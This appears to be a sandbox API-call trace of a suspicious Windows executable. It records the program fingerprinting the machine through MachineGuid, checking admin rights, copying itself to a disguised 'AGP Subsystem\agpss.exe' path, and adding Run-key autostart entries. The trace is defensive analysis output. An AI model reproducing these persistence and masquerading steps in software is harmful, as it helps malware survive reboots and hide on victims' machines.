[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.699] SetWindowPos (hWnd=0x7005c, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28efc8) returned 0x0
[0161.700] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28efa0) returned 0x0
[0161.701] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28ed78 | out: lpwndpl=0x28ed78) returned 1
[0161.701] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28efc8) returned 0x0
[0161.701] GetClientRect (in: hWnd=0x7005c, lpRect=0x28ed28 | out: lpRect=0x28ed28) returned 1
[0161.701] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28ed28 | out: lpRect=0x28ed28) returned 1
[0161.701] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.702] RedrawWindow (hWnd=0x7005c, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1
[0161.702] GetSystemMenu (hWnd=0x7005c, bRevert=0) returned 0x402a7
[0161.702] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28f000 | out: lpwndpl=0x28f000) returned 1
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf020, uEnable=0x1) returned 1
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf000, uEnable=0x1) returned 1
[0161.702] ShowWindow (hWnd=0x7005c, nCmdShow=2) returned 0
[0161.702] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28f074) returned 0x0
[0161.703] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28ee24 | out: lpwndpl=0x28ee24) returned 1
[0161.703] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28f074) returned 0x0
[0161.703] GetClientRect (in: hWnd=0x7005c, lpRect=0x28edd4 | out: lpRect=0x28edd4) returned 1
[0161.704] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28edd4 | out: lpRect=0x28edd4) returned 1
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.704] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.704] GetSystemMetrics (nIndex=42) returned 0
[0161.704] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef70, nMaxCount=1 | out: lpString="") returned 0
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef70) returned 0x0
[0161.705] SendMessageW (hWnd=0x7005c, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0161.705] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0161.706] GetWindowThreadProcessId (in: hWnd=0x7005c, lpdwProcessId=0x28eddc | out: lpdwProcessId=0x28eddc) returned 0x5c0
[0161.706] GetCurrentThreadId () returned 0x5c0
[0161.707] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1d4
[0161.708] PostMessageW (hWnd=0x7005c, Msg=0xc1d4, wParam=0x0, lParam=0x0) returned 1
[0161.723] OleInitialize (pvReserved=0x0) returned 0x0
[0161.724] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x28f190 | out: lplpMessageFilter=0x28f190*=0x0) returned 0x0
[0161.725] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 1
[0161.726] IsWindowUnicode (hWnd=0x7005c) returned 1
[0161.727] GetMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x28f164) returned 1
[0161.728] TranslateMessage (lpMsg=0x28f164) returned 0
[0161.728] DispatchMessageW (lpMsg=0x28f164) returned 0x0
[0161.737] GetFocus () returned 0x0
[0161.737] ShowWindow (hWnd=0x7005c, nCmdShow=0) returned 1
[0161.737] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0
[0161.737] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28ec2c) returned 0x0
[0161.738] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28e9dc | out: lpwndpl=0x28e9dc) returned 1
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28ec2c) returned 0x0
[0161.738] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e98c | out: lpRect=0x28e98c) returned 1
[0161.738] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e98c | out: lpRect=0x28e98c) returned 1
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0161.738] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e9b8 | out: lpRect=0x28e9b8) returned 1
[0161.738] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e9b8 | out: lpRect=0x28e9b8) returned 1
[0161.927] CoTaskMemAlloc (cb=0x20c) returned 0x766c10
[0161.927] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x766c10, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")) returned 0x5f
[0161.927] CoTaskMemFree (pv=0x766c10)
[0161.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x28e790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a
[0161.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x28e818, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a
[0161.929] SetCurrentDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 1
[0162.007] FindResourceExA (hModule=0x0, lpType=0xa, lpName=0x1, wLanguage=0x0) returned 0x422048
[0162.018] LoadResource (hModule=0x0, hResInfo=0x422048) returned 0x422058
[0162.028] SizeofResource (hModule=0x0, hResInfo=0x422048) returned 0x15f30
[0162.039] LockResource (hResData=0x422058) returned 0x422058
[0165.603] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Global\\{7492bd48-e55d-4165-b6f8-ba286e7dc450}") returned 0x238
[0165.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SOFTWARE\\Microsoft\\Cryptography", cchWideChar=31, lpMultiByteStr=0x28ec60, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\Microsoft\\CryptographyqÛe6", lpUsedDefaultChar=0x0) returned 31
[0165.926] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x28ed04 | out: phkResult=0x28ed04*=0x23c) returned 0x0
[0166.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MachineGuid", cchWideChar=11, lpMultiByteStr=0x28ec50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MachineGuidqag6", lpUsedDefaultChar=0x0) returned 11
[0166.031] RegQueryValueExA (in: hKey=0x23c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x28ecfc, lpData=0x0, lpcbData=0x28ed00*=0x0 | out: lpType=0x28ecfc*=0x1, lpData=0x0, lpcbData=0x28ed00*=0x25) returned 0x0
[0166.032] CoTaskMemFree (pv=0x0)
[0166.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MachineGuid", cchWideChar=11, lpMultiByteStr=0x28ec50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MachineGuidqag6", lpUsedDefaultChar=0x0) returned 11
[0166.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x28beb04, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0
[0166.032] RegQueryValueExA (in: hKey=0x23c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x28ecfc, lpData=0x28ec24, lpcbData=0x28ed00*=0x25 | out: lpType=0x28ecfc*=0x1, lpData="b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6", lpcbData=0x28ed00*=0x25) returned 0x0
[0166.051] RegCloseKey (hKey=0x23c) returned 0x0
[0166.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ecbc | out: phkResult=0x28ecbc*=0x23c) returned 0x0
[0166.082] RegQueryValueExW (in: hKey=0x23c, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x28ecd4, lpData=0x0, lpcbData=0x28ecd0*=0x0 | out: lpType=0x28ecd4*=0x4, lpData=0x0, lpcbData=0x28ecd0*=0x4) returned 0x0
[0166.083] RegQueryValueExW (in: hKey=0x23c, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x28ecd4, lpData=0x28ecc0, lpcbData=0x28ecd0*=0x4 | out: lpType=0x28ecd4*=0x4, lpData=0x28ecc0*=0x1, lpcbData=0x28ecd0*=0x4) returned 0x0
[0166.084] GetCurrentProcess () returned 0xffffffff
[0166.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eca0 | out: TokenHandle=0x28eca0*=0x240) returned 1
[0166.092] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28eca0 | out: TokenInformation=0x0, ReturnLength=0x28eca0) returned 0
[0166.093] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x72f620
[0166.093] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x8, TokenInformation=0x72f620, TokenInformationLength=0x4, ReturnLength=0x28eca0 | out: TokenInformation=0x72f620, ReturnLength=0x28eca0) returned 1
[0166.094] LocalFree (hMem=0x72f620) returned 0x0
[0166.096] DuplicateTokenEx (in: hExistingToken=0x240, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28eca8 | out: phNewToken=0x28eca8*=0x244) returned 1
[0166.097] CheckTokenMembership (in: TokenHandle=0x244, SidToCheck=0x28bf3a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28ecb8 | out: IsMember=0x28ecb8) returned 1
[0166.097] CloseHandle (hObject=0x244) returned 1
[0166.106] GetCurrentProcess () returned 0xffffffff
[0166.146] CoTaskMemAlloc (cb=0x20c) returned 0x7695d8
[0166.146] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7695d8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0
[0166.146] CoTaskMemFree (pv=0x7695d8)
[0166.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x28e714, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22
[0166.148] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6", nBufferLength=0x105, lpBuffer=0x28e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6", lpFilePart=0x0) returned 0x47
[0166.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd4dfffa0, ftLastAccessTime.dwHighDateTime=0x1d8a8be, ftLastWriteTime.dwLowDateTime=0xd4dfffa0, ftLastWriteTime.dwHighDateTime=0x1d8a8be, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.150] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), lpSecurityAttributes=0x0) returned 1
[0166.192] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", nBufferLength=0x105, lpBuffer=0x28e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", lpFilePart=0x0) returned 0x4f
[0166.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9e8) returned 1
[0166.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\run.dat"), fInfoLevelId=0x0, lpFileInformation=0x28ecac | out: lpFileInformation=0x28ecac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9e4) returned 1
[0166.193] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", nBufferLength=0x105, lpBuffer=0x28e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", lpFilePart=0x0) returned 0x4f
[0166.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eba4) returned 1
[0166.194] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\run.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x244
[0166.195] GetFileType (hFile=0x244) returned 0x1
[0166.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eba0) returned 1
[0166.195] GetFileType (hFile=0x244) returned 0x1
[0166.196] WriteFile (in: hFile=0x244, lpBuffer=0x28c05a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x28ec28, lpOverlapped=0x0 | out: lpBuffer=0x28c05a8*, lpNumberOfBytesWritten=0x28ec28*=0x8, lpOverlapped=0x0) returned 1
[0166.198] CloseHandle (hObject=0x244) returned 1
[0166.281] CoTaskMemAlloc (cb=0x20c) returned 0x7695d8
[0166.281] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7695d8 | out: pszPath="C:\\Program Files (x86)") returned 0x0
[0166.285] CoTaskMemFree (pv=0x7695d8)
[0166.285] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x28e76c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16
[0166.353] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0", nBufferLength=0x105, lpBuffer=0x28e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0", lpFilePart=0x0) returned 0x5a
[0166.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28ea18) returned 1
[0166.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\exceptions\\1.2.2.0"), fInfoLevelId=0x0, lpFileInformation=0x28ecdc | out: lpFileInformation=0x28ecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28ea14) returned 1
[0167.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem", nBufferLength=0x105, lpBuffer=0x28e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem", lpFilePart=0x0) returned 0x24
[0167.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)" (normalized: "c:\\program files (x86)"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0167.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.361] CreateDirectoryW (lpPathName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), lpSecurityAttributes=0x0) returned 1
[0167.384] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7b4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9f4) returned 1
[0167.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe"), fInfoLevelId=0x0, lpFileInformation=0x28ecb8 | out: lpFileInformation=0x28ecb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9f0) returned 1
[0167.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7ec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.386] DeleteFileW (lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")) returned 0
[0167.388] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.388] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x28e798, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0167.388] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e798, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.389] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe"), lpNewFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe"), bFailIfExists=1) returned 1
[0167.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x28ecd8 | out: phkResult=0x28ecd8*=0x258) returned 0x0
[0167.453] RegQueryValueExW (in: hKey=0x258, lpValueName="AGP Subsystem", lpReserved=0x0, lpType=0x28eccc, lpData=0x0, lpcbData=0x28ecc8*=0x0 | out: lpType=0x28eccc*=0x0, lpData=0x0, lpcbData=0x28ecc8*=0x0) returned 0x2
[0167.454] RegSetValueExW (in: hKey=0x258, lpValueName="AGP Subsystem", Reserved=0x0, dwType=0x1, lpData="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", cbData=0x5e | out: lpData="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe") returned 0x0
[0167.471] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x2001f, phkResult=0x28ecb8 | out: phkResult=0x28ecb8*=0x254) returned 0x0
[0167.472] RegQueryValueExW (in: hKey=0x254, lpValueName="AGP Subsystem", lpReserved=0x0, lpType=0x28ecd0, lpData=0x0, lpcbData=0x28eccc*=0x0 | out: lpType=0x28ecd0*=0x0, lpData=0x0, lpcbData=0x28eccc*=0x0) returned 0x2
